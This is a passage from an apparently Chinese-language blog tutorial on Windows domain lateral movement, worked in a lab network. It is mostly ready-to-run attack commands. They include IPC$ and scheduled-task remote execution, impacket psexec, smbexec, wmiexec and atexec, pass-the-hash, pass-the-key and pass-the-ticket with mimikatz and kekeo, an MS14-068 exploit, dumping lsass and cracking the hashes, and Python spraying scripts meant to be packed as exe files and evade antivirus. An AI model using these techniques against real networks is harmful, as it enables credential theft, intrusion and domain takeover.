class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 查看文件列表</span></span><br><span class="line">dir \\xx.xx.xx.xx\C$\                </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 下载文件</span></span><br><span class="line">copy \\xx.xx.xx.xx\C$\1.bat 1.bat  </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 复制文件</span></span><br><span class="line">copy 1.bat \\xx.xx.xx.xx\C$  </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 删除文件</span></span><br><span class="line">net use \\xx.xx.xx.xx\C$\1.bat /del  </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 删除IPC</span></span><br><span class="line">net use \\xx.xx.xx.xx\ipc$ \del     </span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 查看对方共享</span></span><br><span class="line">net view xx.xx.xx.xx                </span><br></pre></td></tr></table></figure>

<p>建立IPC常见的错误代码</p>
<ul>
<li>(1) 5：拒绝访问，可能是使用的不是管理员权限，需要先提升权限</li>
<li>(2) 51：网络问题，windoows无法找到网络路径</li>
<li>(3) 53：找不到网站路径，可能是IP地址错误，目标未开机，目标Lanmanserver服务未启动、有防火墙等问题</li>
<li>(4) 67：找不到网络名，本地Lanmanworkstation服务未启动，目标删除ipc$</li>
<li>(5) 1219：提供的凭据和已存在的凭据集冲突，说明已建立IPC$，需要先删除</li>
<li>(6) 1326：账号密码错误</li>
<li>(7) 1792：目标NetLogon服务未启动，连接域控常常会出现此情况</li>
<li>(8) 2242：用户密码过期，目标有账号策略，强制定期更改密码</li>
</ul>
<p>建立IPC失败的原因</p>
<ul>
<li>(1) 目标系统不是NT或以上的操作系统</li>
<li>(2) 对方没有打开IPC$共享</li>
<li>(3) 对方未开启139,445端口，或者被防火墙屏蔽</li>
<li>(4) 输出命令，账号密码有错误</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">at &lt; Windows2012<span class="comment"># 建立ipc连接net use \\192.168.3.21\ipc$ &quot;Admin12345&quot; /user:god.org\administrator # 拷贝执行文件到目标机器copy add.bat \192.168.3.21\c$  # 添加计划任务at \\192.168.3.21 15:47 c:\add.bat     schtasks &gt;=Windows2012# 建立ipc连接net use \\192.168.3.32\ipc$ &quot;admin!@#45&quot; /user:god.org\administrator # 复制文件到其C盘copy add.bat \\192.168.3.32\c$ # 创建adduser任务对应执行文件schtasks /create /s 192.168.3.32 /ru &quot;SYSTEM&quot; /tn adduser /sc DAILY /tr c:\add.bat /F # 运行adduser任务schtasks /run /s 192.168.3.32 /tn adduser /i# 删除adduser任务schtasks /delete /s 192.168.3.21 /tn adduser /f</span></span></span><br></pre></td></tr></table></figure>


<h2 id="3-2横向渗透明文HASH传递（atexec-impacket）"><a href="#3-2横向渗透明文HASH传递（atexec-impacket）" class="headerlink" title="3.2横向渗透明文HASH传递（atexec-impacket）"></a>3.2横向渗透明文HASH传递（atexec-impacket）</h2><p>atexec</p>
<ul>
<li>优点：一句话命令，连接、提权全部搞定。</li>
<li>缺点：第三方工具，非微软官方工具，易被杀毒软件查杀，实战中需要自己做一下免杀。</li>
<li>atexec是Impacket网络协议工具包中的一个工具。Impacket工具包介绍：<a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/175208.html">https://www.freebuf.com/sectool/175208.html</a></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> impacket工具包下载，可下载exe版本https://gitee.com/RichChigga/impacket-examples-windows<span class="comment"># 工作组atexec.exe ./administrator:Admin12345@192.168.3.21 &quot;whoami&quot;# 域内atexec.exe god/administrator:Admin12345@192.168.3.21 &quot;whoami&quot;# 明文HASHatexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 &quot;whoami&quot;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="3-3横向渗透明文HASH传递批量利用-综合"><a href="#3-3横向渗透明文HASH传递批量利用-综合" class="headerlink" title="3.3横向渗透明文HASH传递批量利用-综合"></a>3.3横向渗透明文HASH传递批量利用-综合</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 批量检测IP对应明文连接FOR /F %%i <span class="keyword">in</span> (ips.txt) <span class="keyword">do</span> net use \%%i\ipc$ <span class="string">&quot;admin!@#45&quot;</span> /user:administrator <span class="comment"># 批量检测IP对应明文回显版FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami # 批量检测明文对应IP回显版FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami # 批量检测HASH对应IP回显版FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami</span></span> </span><br></pre></td></tr></table></figure>





<h2 id="3-4横向渗透明文HASH传递批量利用-升级版"><a href="#3-4横向渗透明文HASH传递批量利用-升级版" class="headerlink" title="3.4横向渗透明文HASH传递批量利用-升级版"></a>3.4横向渗透明文HASH传递批量利用-升级版</h2><p>上述批处理命令只能遍历一个变量（不知道可不可遍历2个变量，反正我不会写），如果想要遍历多个变量，比如IP、用户名、密码等，可以写python脚本，免杀，使用Pyinstaller打包成exe文件，上传到目标机器运行。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os,timeips=&#123;   <span class="string">&#x27;192.168.3.21&#x27;</span>,   <span class="string">&#x27;192.168.3.25&#x27;</span>,   <span class="string">&#x27;192.168.3.29&#x27;</span>,   <span class="string">&#x27;192.168.3.30&#x27;</span>,   <span class="string">&#x27;192.168.3.31&#x27;</span>,   <span class="string">&#x27;192.168.3.33&#x27;</span>&#125; users=&#123;   <span class="string">&#x27;Administrator&#x27;</span>,   <span class="string">&#x27;boss&#x27;</span>,   <span class="string">&#x27;dbadmin&#x27;</span>,   <span class="string">&#x27;fileadmin&#x27;</span>,   <span class="string">&#x27;mack&#x27;</span>,   <span class="string">&#x27;mary&#x27;</span>,   <span class="string">&#x27;vpnadm&#x27;</span>,   <span class="string">&#x27;webadmin&#x27;</span>&#125;passs=&#123;   <span class="string">&#x27;admin&#x27;</span>,   <span class="string">&#x27;admin!@#45&#x27;</span>,   <span class="string">&#x27;Admin12345&#x27;</span>&#125; <span class="keyword">for</span> ip <span class="keyword">in</span> ips:   <span class="keyword">for</span> user <span class="keyword">in</span> users:       <span class="keyword">for</span> mima <span class="keyword">in</span> passs:           <span class="built_in">exec</span>=<span class="string">&quot;net use \&quot;+ &quot;</span>\<span class="string">&quot;+ip+&#x27;\ipc$ &#x27;+mima+&#x27; /user:god\&#x27;+user           print(&#x27;---&gt;&#x27;+exec+&#x27;&lt;---&#x27;)           os.system(exec)           time.sleep(1)</span></span><br></pre></td></tr></table></figure>

<p>编译</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 安装pyinstallerpip install pyinstaller<span class="comment"># 生成可执行EXEpyinstaller -F fuck_neiwang_001.py</span></span> </span><br></pre></td></tr></table></figure>



<h2 id="3-5横向渗透Procdump-Mimikatz配合获取"><a href="#3-5横向渗透Procdump-Mimikatz配合获取" class="headerlink" title="3.5横向渗透Procdump+Mimikatz配合获取"></a>3.5横向渗透Procdump+Mimikatz配合获取</h2><p>Mimikatz属于第三方软件，直接上传到目标主机可能被杀毒软件查杀，这时我们可以配合<strong>官方软件Procdump</strong>，将Procdump上传目标主机获取用户信息(该文件不可读)，使用本地的Mimikatz打开Procdump获取的用户信息。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> Procdump下载：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump<span class="comment"># mimikatz下载：https://github.com/gentilkiwi/mimikatz/releases# procdump 在目标机上执行procdump -accepteula -ma lsass.exe lsass.dmp # mimikatz 在本地执行：sekurlsa::minidump lsass.dmpsekurlsa::logonPasswords full</span></span></span><br></pre></td></tr></table></figure>

<h2 id="3-6Hashcat破解获取Windows-NTML-Hash"><a href="#3-6Hashcat破解获取Windows-NTML-Hash" class="headerlink" title="3.6Hashcat破解获取Windows NTML Hash"></a>3.6Hashcat破解获取Windows NTML Hash</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> Hashcat下载：https://github.com/hashcat/hashcat<span class="comment"># 密码破解全能工具-Hashcat密码破解攻略：https://www.freebuf.com/sectool/164507.html# 爆破命令hashcat -a 0 -m 1000 hash file --force</span></span> </span><br></pre></td></tr></table></figure>

<h2 id="3-7域横向移动SMB服务利用-psexec-smbexec"><a href="#3-7域横向移动SMB服务利用-psexec-smbexec" class="headerlink" title="3.7域横向移动SMB服务利用-psexec,smbexec"></a>3.7域横向移动SMB服务利用-psexec,smbexec</h2><p>利用SMB服务可以通过明文或hash传递来远程执行，条件445服务端口开放。<br>psexec工具：</p>
<ul>
<li>在微软官方Pstools工具包中，但是官方Pstools中的psexec只能明文连接，无法采用hash连接。</li>
<li>如果需要hash连接，可以使用impacket工具包中的psexec，但是impacket非官方自带，容易被杀。</li>
<li>Pstools官方工具包：<ul>
<li><a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/sysinternals/downloads/pstools">https://docs.microsoft.com/en-us/sysinternals/downloads/pstools</a></li>
</ul>
</li>
<li>impacket工具包：<ul>
<li><a target="_blank" rel="noopener" href="https://gitee.com/RichChigga/impacket-examples-windows">https://gitee.com/RichChigga/impacket-examples-windows</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket">https://github.com/SecureAuthCorp/impacket</a></li>
</ul>
</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> psexec第一种：先有ipc链接，psexec需要明文或<span class="built_in">hash</span>传递net use \\192.168.3.32\ipc$ <span class="string">&quot;admin!@#45&quot;</span> /user:administratorpsexec \\192.168.3.32 -s cmd <span class="comment"># 需要先有ipc链接 -s以System权限运行 # psexec第二种：不用建立IPC直接提供明文账户密码（推荐）psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmdpsexec -hashes :$HASH$ ./administrator@10.1.2.3psexec -hashes :$HASH$ domain/administrator@10.1.2.3psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 # smbexec工具：#非官方自带-参考impacket工具包使用，操作简单，容易被杀#smbexec无需先ipc链接 明文或hash传递smbexec god/administrator:Admin12345@192.168.3.21smbexec ./administrator:admin!@#45@192.168.3.32smbexec -hashes :$HASH$ ./admin@192.168.3.21smbbexec -hashes :$HASH$ domain/admin@192.168.3.21smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21</span></span></span><br></pre></td></tr></table></figure>



<h2 id="3-8域横向移动WMI服务利用-cscript-wmiexec-wmic"><a href="#3-8域横向移动WMI服务利用-cscript-wmiexec-wmic" class="headerlink" title="3.8域横向移动WMI服务利用-cscript,wmiexec,wmic"></a>3.8域横向移动WMI服务利用-cscript,wmiexec,wmic</h2><p>WMI(Windows Management Instrumentation) 是通过135端口进行利用，支持用户名明文或者hash的方式进行认证，并且该方法<strong>不会在目标日志系统留下痕迹</strong>。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">自带WMIC 明文传递 优点是自带工具，不用考虑免杀，缺点是无回显</span></span><br><span class="line">wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create &quot;cmd.exe /c ipconfig &gt;C:\1.txt&quot;</span><br><span class="line"><span class="meta"> </span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 自带cscript明文传递 有回显 需要借助 wmiexec.vbs脚本</span></span><br><span class="line"><span class="meta">#</span><span class="bash"> wmiexec.vbs脚本下载：</span></span><br><span class="line"><span class="meta">#</span><span class="bash"> https://www.secpulse.com/wp-content/uploads/2015/05/cache-a360611dc24d240989799c29c555e4b7_wmiexec-v1_1.rar</span></span><br><span class="line">cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345</span><br><span class="line"><span class="meta"> </span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 套件impacket wmiexec 明文或<span class="built_in">hash</span>传递 有回显exe版本 易被杀</span></span><br><span class="line">wmiexec ./administrator:admin!@#45@192.168.3.32 &quot;whoami&quot;</span><br><span class="line">wmiexec god/administrator:Admin12345@192.168.3.21 &quot;whoami&quot;</span><br><span class="line">wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 &quot;whoami&quot;</span><br><span class="line">wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 &quot;whoami&quot;</span><br></pre></td></tr></table></figure>

<h2 id="3-9域横向移动以上服务hash批量利用-python编译exe（以上汇总）"><a href="#3-9域横向移动以上服务hash批量利用-python编译exe（以上汇总）" class="headerlink" title="3.9域横向移动以上服务hash批量利用-python编译exe（以上汇总）"></a>3.9域横向移动以上服务hash批量利用-python编译exe（以上汇总）</h2><h3 id="3-9-1mimikatz收集到密码hash（假设没收集到明文）"><a href="#3-9-1mimikatz收集到密码hash（假设没收集到明文）" class="headerlink" title="3.9.1mimikatz收集到密码hash（假设没收集到明文）"></a>3.9.1mimikatz收集到密码hash（假设没收集到明文）</h3><p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637083552922-94300907-83eb-4895-a1c6-7d2ccd50b74a.png" alt="image.png"></p>
<h3 id="3-9-2探测同网段存活主机"><a href="#3-9-2探测同网段存活主机" class="headerlink" title="3.9.2探测同网段存活主机"></a>3.9.2探测同网段存活主机</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 自带内部命令（推荐使用）</span></span><br><span class="line">for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr &quot;TTL =&quot; </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637083677266-784614c1-0a55-472a-89a0-74279fd6c7ae.png" alt="image.png"></p>
<h3 id="3-9-3收集域用户名信息"><a href="#3-9-3收集域用户名信息" class="headerlink" title="3.9.3收集域用户名信息"></a>3.9.3收集域用户名信息</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 获取当前域里面的用户</span></span><br><span class="line">net user /domain </span><br></pre></td></tr></table></figure>

<p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637083677266-784614c1-0a55-472a-89a0-74279fd6c7ae-164600282995822.png" alt="image.png"></p>
<h3 id="3-9-4将收集到的IP，用户名，密码hash通过脚本批量利用"><a href="#3-9-4将收集到的IP，用户名，密码hash通过脚本批量利用" class="headerlink" title="3.9.4将收集到的IP，用户名，密码hash通过脚本批量利用"></a>3.9.4将收集到的IP，用户名，密码hash通过脚本批量利用</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os,time</span><br><span class="line"> </span><br><span class="line">ips=&#123;</span><br><span class="line"><span class="string">&#x27;192.168.3.21&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;192.168.3.25&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;192.168.3.29&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;192.168.3.30&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;192.168.3.32&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">users=&#123;</span><br><span class="line"><span class="string">&#x27;Administrator&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;boss&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;dbadmin&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;fileadmin&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;mack&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;mary&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;webadmin&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">hashs=&#123;</span><br><span class="line"><span class="comment">#&#x27;ccef208c6485269c20db2cad21734fe7&#x27;,</span></span><br><span class="line"><span class="string">&#x27;518b98ad4178a53695dc997aa02d455c&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">for</span> ip <span class="keyword">in</span> ips:</span><br><span class="line">    <span class="keyword">for</span> user <span class="keyword">in</span> users:</span><br><span class="line">        <span class="keyword">for</span> mimahash <span class="keyword">in</span> hashs:</span><br><span class="line">            <span class="comment">#域用户和本地用户都试试</span></span><br><span class="line">            <span class="comment">#wmiexec -hashes :hash god/user@ip whoami</span></span><br><span class="line">            <span class="comment">#wmiexec -hashes :hash ./user@ip whoami</span></span><br><span class="line">            <span class="built_in">exec</span> = <span class="string">&quot;wmiexec -hashes :&quot;</span>+mimahash+<span class="string">&quot; god/&quot;</span>+user+<span class="string">&quot;@&quot;</span>+ip+<span class="string">&quot; whoami&quot;</span></span><br><span class="line">            <span class="built_in">exec</span> = <span class="string">&quot;wmiexec -hashes :&quot;</span>+mimahash+<span class="string">&quot; ./&quot;</span>+user+<span class="string">&quot;@&quot;</span>+ip+<span class="string">&quot; whoami&quot;</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;---&gt;&#x27;</span> + <span class="built_in">exec</span> + <span class="string">&#x27;&lt;---&#x27;</span>)</span><br><span class="line">            os.system(<span class="built_in">exec</span>)</span><br><span class="line">            time.sleep(<span class="number">0.5</span>)</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 编译成exe文件pyinstaller.exe -F fuck_neiwang_001.py</span></span><br></pre></td></tr></table></figure>

<p>执行exe文件，拿下192.168.3.29主机<br>在192.168.3.29主机运行minikatz，获取到一个新的密码hash（假设只找到了hash）<br>将新的hash加入到python脚本中，重新编译打包，执行exe文件，就有可能渗透到别的主机，甚至域控。</p>
<h2 id="3-10域横向移动PTH传递-mimikatz"><a href="#3-10域横向移动PTH传递-mimikatz" class="headerlink" title="3.10域横向移动PTH传递-mimikatz"></a>3.10域横向移动PTH传递-mimikatz</h2><p>注：<br>Windows系统LM Hash及NTLM Hash加密算法，个人系统在Windows vista后，服务器系统在Windows 2003以后，认证方式均为NTLM Hash。由于目前大部分主机系统都很新，所以一般我们收集的都是NTLM数据，但是也不排除内网中有老系统，所以在信息收集的时候，最好LM和NTLM都收集一下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PTH ntlm传递 - 未打补丁下的工作组及域连接： sekurlsa::logonPasswords    获取NTLM值 sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7        连接域用户sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c      连接本地用户sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 注意区分本地用户与域用户，在实战中都尝试连接一下dir \\OWA2010CN-God.god.org\c$dir \\192.168.3.21\c$</span><br></pre></td></tr></table></figure>

<h2 id="3-11域横向移动PTK传递-mimikatz"><a href="#3-11域横向移动PTK传递-mimikatz" class="headerlink" title="3.11域横向移动PTK传递-mimikatz"></a>3.11域横向移动PTK传递-mimikatz</h2><p>注：<br>在实际上，PTK传递比PTH传递用的少，因为PTK传递需要一个前提条件，主机必须打了补丁kb2871997。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PTK aes256传递 - 打补丁后的工作组及域连接：# 获取aes256值 sekurlsa::ekeys sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b</span><br></pre></td></tr></table></figure>

<h2 id="3-12域横向移动PTT传递-ms14068-amp-kekeo-amp-本地"><a href="#3-12域横向移动PTT传递-ms14068-amp-kekeo-amp-本地" class="headerlink" title="3.12域横向移动PTT传递-ms14068&amp;kekeo&amp;本地"></a>3.12域横向移动PTT传递-ms14068&amp;kekeo&amp;本地</h2><p>总结：<br>PTT传递不需本地管理员权限，连接时主机名连接，分为：<br>基于漏洞<br>工具<br>本地票据</p>
<h3 id="3-12-1利用漏洞ms14068"><a href="#3-12-1利用漏洞ms14068" class="headerlink" title="3.12.1利用漏洞ms14068"></a>3.12.1利用漏洞ms14068</h3><p>ms14068—–&gt;powershell执行，能实现普通用户直接获取域控system权限<br>MS14-068造成的危害是允许域内任何一个普通用户，将自己提升至域管权限。微软给出的补丁是kb3011780。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> MS14-068下载https://github.com/abatchy17/WindowsExploits/tree/master/MS14-0681.查看当前sidwhoami/user //查看当前sid 2.清空当前机器中所有凭证mimikatz <span class="comment"># kerberos::list   //查看当前机器凭证mimikatz # kerberos::purge  //清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造# 或者klist //查看凭证列表klist purge //清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造3.利用ms14-068生成TGT数据ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45 4.票据注入内存./mimikatz.exekerberos::ptc TGT_mary@god.org.ccacheexit 5.查看凭证列表klist //查看凭证列表 6.利用dir \192.168.3.21\c$dir \\OWA2010CN-God.god.org\c$</span></span></span><br></pre></td></tr></table></figure>

<h3 id="3-12-2利用工具kekeo"><a href="#3-12-2利用工具kekeo" class="headerlink" title="3.12.2利用工具kekeo"></a>3.12.2利用工具kekeo</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 工具kekeo下载https://github.com/gentilkiwi/kekeo/releases1.生成票据.\kekeo <span class="string">&quot;tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c&quot;</span> 2.导入票据kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi 3.查看凭证 klist 4.利用dir \192.168.3.21\c<span class="variable">$dir</span> \\OWA2010CN-God.god.org\c$</span></span><br></pre></td></tr></table></figure>

<h3 id="3-12-3利用本地票据-需管理权限"><a href="#3-12-3利用本地票据-需管理权限" class="headerlink" title="3.12.3利用本地票据(需管理权限)"></a>3.12.3利用本地票据(需管理权限)</h3><p>原理：<br>因为当前主机肯定之前与其他主机连接过，所以本地应该生成了一些票据，我们可以导出这些票据，然后再导入票据，利用。该方法类似于cookie欺骗。<br>​</p>
<p>条件：<br>票据是有有效期的，一般为10小时，所以如果当前主机10h之内连接过域控的话，我们可以利用该票据，但是如果超过10h，就没法利用了。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.导出本地票据(需管理权限)sekurlsa::tickets /export 2.导入票据kerberos::ptt xxxxxxxxxx.xxxx.kirbi 3.查看票据klist 4.利用dir \\OWA2010CN-God.god.org\c$ dir \192.168.3.21\c$</span><br></pre></td></tr></table></figure>

<h2 id="3-13国产Ladon内网杀器"><a href="#3-13国产Ladon内网杀器" class="headerlink" title="3.13国产Ladon内网杀器"></a>3.13国产Ladon内网杀器</h2><p>信息收集-协议扫描-漏洞探针-传递攻击等</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 官网：http://k8gege.org/Ladon/<span class="comment"># 具体用法请查看官网wiki，举例如下Ladon.exe 192.168.1.8/24 OnlinePC 扫当前机器所处C段的存活主机，其它模块同理Ladon.exe 192.168.1.8/24 OsScan 扫当前机器所处C段操作系统版本，其它模块同理Ladon.exe 192.168.1.8/24 MysqlScan 扫当前机器所处C段的ssh端口，其它模块同理Ladon 192.168.1.8/24 MS17010 扫当前机器所处C段的永恒之蓝漏洞，其它模块同理# 参考：https://www.cnblogs.com/zpchcbd/p/11944486.html</span></span></span><br></pre></td></tr></table></figure>



<h2 id="3-14域横向移动RDP传递-Mimikatz"><a href="#3-14域横向移动RDP传递-Mimikatz" class="headerlink" title="3.14域横向移动RDP传递-Mimikatz"></a>3.14域横向移动RDP传递-Mimikatz</h2><p>除了上述讲到的IPC，WMI，SMB等协议的链接外，获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。<br>​</p>
<p>RDP协议连接：判断对方远程桌面服务是否开启（默认：3389），端口扫描判断</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">RDP明文密码链接</span><br><span class="line"><span class="meta">#</span><span class="bash"> windows:</span></span><br><span class="line">mstsc.exe /console /v:192.168.3.21 /admin</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> linux:</span> </span><br><span class="line">rdesktop 192.168.3.21:3389</span><br><span class="line"> </span><br><span class="line">RDP密文HASH链接</span><br><span class="line">windows Server需要开启 Restricted Admin mode，在Windows 8.1和Windows Server 2012 R2中默认开启，</span><br><span class="line">同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持；</span><br><span class="line"> </span><br><span class="line">开启命令：</span><br><span class="line">REG ADD &quot;HKLM\System\CurrentControlSet\Control\Lsa&quot; /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f</span><br><span class="line"> </span><br><span class="line">开启后运行：</span><br><span class="line">mstsc.exe /restrictedadmin</span><br><span class="line">mimikatz.exe</span><br><span class="line">privilege::debug</span><br><span class="line">sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 &quot;/run:mstsc.exe /restrictedadmin&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="3-15域横向移动SPN服务-探针-请求-导出-破解-重写"><a href="#3-15域横向移动SPN服务-探针-请求-导出-破解-重写" class="headerlink" title="3.15域横向移动SPN服务-探针,请求,导出,破解,重写"></a>3.15域横向移动SPN服务-探针,请求,导出,破解,重写</h2><p>kerberos中的spn详解：<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/backlion/p/8082623.html">https://www.cnblogs.com/backlion/p/8082623.html</a><br>​</p>
<p>黑客可以使用有效的域用户的身份验证票证（TGT）去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN，并使用与SPN关联的服务帐户加密票证，以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5，这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解，即可得到目标服务帐号的HASH，这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN，那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。<br>​</p>
<p>SPN扫描</p>
<ul>
